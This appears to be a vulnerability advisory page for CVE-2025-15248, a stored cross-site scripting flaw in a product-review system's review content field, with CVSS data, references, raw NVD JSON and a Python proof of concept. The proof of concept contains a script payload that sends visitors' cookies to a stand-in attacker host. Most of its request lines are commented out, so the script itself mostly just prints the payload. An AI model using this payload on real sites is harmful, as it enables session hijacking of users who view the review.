CVE-2025-15248

Description

A security flaw has been discovered in sunhailin12315 product-review 商品评价系统 up to 91ead6890b4065bb45b7602d0d73348e75cb4639. This affects an unknown part of the component Write a Review. Performing manipulation of the argument content results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. This product adopts a rolling release strategy to maintain continuous delivery The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

sunhailin12315/product-review < 91ead6890b4065bb45b7602d0d73348e75cb4639

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15248 XSS PoC
# Target: sunhailin12315/product-review
# Attack Vector: Write a Review - content parameter

target_url = "http://target-site.com/review/submit"  # Replace with actual target

# Malicious XSS payload
xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>"

# PoC for testing XSS vulnerability in review submission
def test_xss_vulnerability():
    """
    Test if the target is vulnerable to CVE-2025-15248
    
    Steps:
    1. Authenticate with low-privilege account
    2. Submit a review with XSS payload in 'content' parameter
    3. Verify the payload is stored without sanitization
    4. Check if the script executes when viewing the review
    """
    
    session = requests.Session()
    
    # Step 1: Login with low-privilege account
    login_data = {
        "username": "attacker_account",
        "password": "password123"
    }
    # login_response = session.post(f"{target_url}/login", data=login_data)
    
    # Step 2: Submit review with XSS payload
    review_data = {
        "content": xss_payload,
        "product_id": "12345"
    }
    # submit_response = session.post(f"{target_url}/review/submit", data=review_data)
    
    print("[+] XSS payload submitted in content parameter")
    print(f"[+] Payload: {xss_payload}")
    print("[+] If vulnerable, script will execute when review is viewed")
    
    return True

if __name__ == "__main__":
    test_xss_vulnerability()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15248
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15248
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15248/
[4] VulDB https://vuldb.com/cve/CVE-2025-15248
[5] https://gitee.com/sunhailin12315/product-review/issues/ICK775
[6] https://vuldb.com/?ctiid.338638
[7] https://vuldb.com/?id.338638

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15248", "sourceIdentifier": "[email protected]", "published": "2025-12-30T13:16:23.020", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in sunhailin12315 product-review 商品评价系统 up to 91ead6890b4065bb45b7602d0d73348e75cb4639. This affects an unknown part of the component Write a Review. Performing manipulation of the argument content results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. This product adopts a rolling release strategy to maintain continuous delivery The project was informed of the problem early through an issue report but has not responded yet."}, {"lang": "es", "value": "Se ha descubierto una falla de seguridad en sunhailin12315 product-review ?????? hasta 91ead6890b4065bb45b7602d0d73348e75cb4639. Esto afecta una parte desconocida del componente Escribir una reseña. Realizar la manipulación del contenido del argumento resulta en cross-site scripting. El ataque es posible de llevar a cabo de forma remota. El exploit ha sido publicado al público y puede ser explotado. Este producto adopta una estrategia de lanzamiento continuo para mantener la entrega continua. El proyecto fue informado del problema temprano a través de un informe de problema pero aún no ha respondido."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://gitee.com/sunhailin12315/product-review/issues/ICK775", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.338638", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.338638", "source": "[email protected]"}]}}